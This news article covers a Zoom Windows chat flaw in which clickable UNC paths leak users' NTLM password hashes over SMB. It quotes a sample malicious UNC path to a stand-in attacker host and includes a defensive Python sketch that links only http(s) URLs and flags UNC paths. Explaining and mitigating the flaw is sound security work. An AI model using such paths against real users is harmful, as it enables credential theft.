Zoom User Warning: This Is How Attackers Could Steal Windows Passwords

Today, news of a Zoom issue affecting Microsoft Windows users. The Zoom Windows client is at risk from a flaw in the chat feature that could allow attackers to steal the logins of people who click on a link, according to tech site Bleeping Computer.

When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.

But the Zoom client apparently also turns Windows networking Universal Naming Convention (UNC) paths into a clickable link in the chat messages, security researcher @_g0dmode has found.


Ok, so what’s the problem?

Bleeping Computer demonstrated how a regular URL and the UNC path \\evil.server.com\images\cat.jpg were both converted into clickable links in the chat message.

The problem with this is, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file sharing protocol to open the remote cat.jpg file.”

At the same time, by default, Windows sends the user’s login name and NTLM password hash to the remote server. An attacker can crack that hash fairly easily to reveal the password.
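To make the behaviour concrete from the defensive side, here is a sketch of a chat renderer that links only http(s) URLs and leaves UNC paths as inert text, plus a helper that flags UNC paths in a message. It is an added example, not Zoom's code; the function names, the regular expressions and the HTML output format are assumptions made for illustration.

```python
import html
import re

# Assumed policy for this example: only http(s) URLs may become clickable links.
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

# UNC path: two backslashes, a host, a backslash, a share, then an optional rest.
UNC_RE = re.compile(r"\\\\[^\\/\s]+\\[^\\/\s]+(?:\\[^\s]*)?")

# Constructed sample message, using the UNC path quoted in the article.
SAMPLE = r"Agenda: https://example.com/agenda and \\evil.server.com\images\cat.jpg"


def find_unc_paths(message):
    """Return every UNC path in a chat message, e.g. for logging or a user warning."""
    return UNC_RE.findall(message)


def render_message(message):
    """Render a chat message as HTML.

    http(s) URLs become anchors; everything else, UNC paths included,
    is escaped and emitted as plain text, so a click cannot start an SMB connection.
    """
    out = []
    pos = 0
    for match in URL_RE.finditer(message):
        out.append(html.escape(message[pos:match.start()]))
        url = html.escape(match.group(0), quote=True)
        out.append('<a href="{0}">{0}</a>'.format(url))
        pos = match.end()
    out.append(html.escape(message[pos:]))
    return "".join(out)


if __name__ == "__main__":
    print(render_message(SAMPLE))
    print("UNC paths flagged:", find_unc_paths(SAMPLE))
```
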

Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.
